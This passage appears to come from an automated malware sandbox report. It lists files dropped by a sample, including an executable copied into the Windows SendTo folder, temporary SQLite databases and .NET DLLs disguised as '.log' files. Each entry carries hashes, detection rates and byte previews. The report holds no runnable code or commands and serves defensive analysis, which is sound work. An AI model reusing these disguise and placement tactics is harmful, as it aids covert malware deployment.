                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\xHI7oKX1Yb

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):25
                                          Entropy (8bit):4.403856189774723
                                          Encrypted:false
                                          SSDEEP:3:I8DjOKo90dN:1jyWdN
                                          MD5:8B6DEB79DC5DB96C4F16CB7F59DE6B9B
                                          SHA1:69B41346161F8B9BFDC53D2D1583F6A5C86BF55C
                                          SHA-256:F1C7B9932F20748278515BB70E1B65C5FE1FD81226BA6F7FDCBC3D0D814523A1
                                          SHA-512:4B4EF62A8D079C4D494101DC9339109B8274E77CA7A8BAF9ACC9C94CF98B4302C1E87CA94BDF5949430347F1997D74E3A7198EEA5EEF17B1C9087A181048A16E
                                          Malicious:false
                                          Preview:22gBDYfzpeoh6InoM7wNQxbRx

                                          C:\Users\user\AppData\Local\Temp\xIRy7cT0TR

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\xVMCEQk1FO

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\y1RRv9Vvha

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\y5Ni1TzTVl

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\yG95zkN7cc

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ySZGCfyqzM

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\yiOEpMTQwk

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\zgmwm2eS5w

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ziB200T4Lw

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\557bb37d3fa657

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with very long lines (818), with no line terminators
                                          Category:dropped
                                          Size (bytes):818
                                          Entropy (8bit):5.914959416671634
                                          Encrypted:false
                                          SSDEEP:12:/N1AYJ++bGWey8R1eOVlcxiXeIPNXa/ruDek8nPns3/OBxFKEy5h6Rimo+EUkhF+:/8Yvb/8TeELXYuSrP7hahvmcUAAGY
                                          MD5:F46553736E1DC1278196FA025018974B
                                          SHA1:09D502CBBEB6136BF2043D958FD23CA3C3ABF9DA
                                          SHA-256:D2195C3070971A765665602DC97F0B385D7EDAFEBC2B12CB9AFBA0170D417ECC
                                          SHA-512:1C4A027ABA3C4FB904C4BFC1E7E4A8F092B0940596B3E843D64D6FB51DA69EA353CAE4D952BCA99F235A5018D00FF4B1102404D0EEEB771E3E560BD70FD51A13
                                          Malicious:false
                                          Preview:KV8ZDYW2XlLWLBqUXAKj320A45yAg1i3HYFupjgtFc6jJpfoUEORdR5Re7fIjWWgCRPw65pyebeb6Q0OZKpbnRazdyPrEYJtFZg2atsYYZwBxeVOHRsZq53v0ZTHq8uGSuVgt7yqbRDNfZC9dBjxptCKgvCAaksapptCIyeJcB7Z2pPbXTopY7bisLA75xQ0imhzq91ogaUnwmR0gkmG6CBsOKU6ygOovG0PHavYcAI8mxwF3JbULK4glzlfo409Mp2pwCtFzNn53DFbYPCoF3dlMUoSyQtiJJw74HT1aVf7g8mhtJGZ1L4TLRdbYaQjeFwuQIgR6LOtXfENsGipJUq8Odvmo1d9E6daM1Qlnzdq6L5qMPtR2lZJZyfxW3nEsPobCoA0z6BU1ABDhFaYILHdgTAYVdPtLY7rgenhP2b5jFSZwcPQdP5gHL4somfWrSIcCUhDc2IQtM3bBll3N8P6cajVj53mWFNR70Wc4MylGpw5SdqCAlIsDL9luLdg8f3o8ldLOJ8BKn0xnnDGO0mv7eNv0urssRnkwI6q9fy0nGiZUL8HIXSH3IqeYrUdcPT2AQAfqWGsCvI05ybowkkU8fqobcSSLUYXxpYELdavRkEI90ijQpr1p83fjWDOEyhsWuDPaWdTKyDYaiol4sBfngryw3fyZLrcCWvPxSJ4LXr15fEArbTWwBFzDOdg1o38HkVExZyljHUPz03QyeH82VqBR5MiymCgetuUJ9NSnrwprzAMVMrWh5Gw4Ux1NQx6ExuFGiHyQzUKiATb59Ml4p9jn8ayMWEX40k4E4FxF2Gsk6

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                          Category:dropped
                                          Size (bytes):3511394
                                          Entropy (8bit):7.993950820060533
                                          Encrypted:true
                                          SSDEEP:49152:uGmcpg5vS+c8OorsMzNRK6v1hFXefh0iMB+0b+N/uyVbVihyXYuIS:t0vfxoEe6vHFXgh5cb+NhqlS
                                          MD5:3C9CF0B38226E2A7F0191A0130536859
                                          SHA1:87D531257A15E18B50FA341BCE9AC3C5A71BA80D
                                          SHA-256:4AC2DDB4FA2D1917AE491B5AC623E7EBF23E5E34667C63E5ACD433CC6696C23D
                                          SHA-512:AD6BC0C26B6ADBB7EAD5DB17FB4FD4285BCFD623531F41AD6AE31E97A1E760A59F36DE05EAB0E298E0892FEA03D4A4C2AE389D90036C784EDB44E61D7A8161D2
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 68%
                                          Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@..p....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe:Zone.Identifier

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0

                                          C:\Users\user\Desktop\BKcXESYN.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):34304
                                          Entropy (8bit):5.618776214605176
                                          Encrypted:false
                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Joe Sandbox View:
                                          • Filename: eRZQCpMb4y.exe, Detection: malicious, Browse
                                          • Filename: PCCooker2.0_x64.exe, Detection: malicious, Browse
                                          • Filename: kIdT4m0aa4.exe, Detection: malicious, Browse
                                          • Filename: 5R28W1PAnS.exe, Detection: malicious, Browse
                                          • Filename: iqA8j9yGcd.exe, Detection: malicious, Browse
                                          • Filename: TwfUz3FuO7.exe, Detection: malicious, Browse
                                          • Filename: z3yAH0LL5e.exe, Detection: malicious, Browse
                                          • Filename: Componentsession.exe, Detection: malicious, Browse
                                          • Filename: -#U00bc).exe, Detection: malicious, Browse
                                          • Filename: Loader.exe, Detection: malicious, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\BgcwUNOc.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):34304
                                          Entropy (8bit):5.618776214605176
                                          Encrypted:false
                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\BxjPijIe.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):39936
                                          Entropy (8bit):5.660491370279985
                                          Encrypted:false
                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                          MD5:240E98D38E0B679F055470167D247022
                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\DNOFZBcI.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):41472
                                          Entropy (8bit):5.6808219961645605
                                          Encrypted:false
                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 8%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\DvHnLgjG.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):85504
                                          Entropy (8bit):5.8769270258874755
                                          Encrypted:false
                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 71%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                          C:\Users\user\Desktop\FGdoLyOG.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):32256
                                          Entropy (8bit):5.631194486392901
                                          Encrypted:false
                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 29%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\FPAovlhD.log

                                          Download File
                                          Process:C:\Users\user\Desktop\84JufgBTrA.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):24576
                                          Entropy (8bit):5.535426842040921
                                          Encrypted:false
                                          SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                          MD5:5420053AF2D273C456FB46C2CDD68F64
                                          SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                          SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                          SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 17%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                          C:\Users\user\Desktop\FoaFqfIX.log

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):46592
                                          Entropy (8bit):5.870612048031897
                                          Encrypted:false
                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                          Malicious:true
                                          Antivirus:
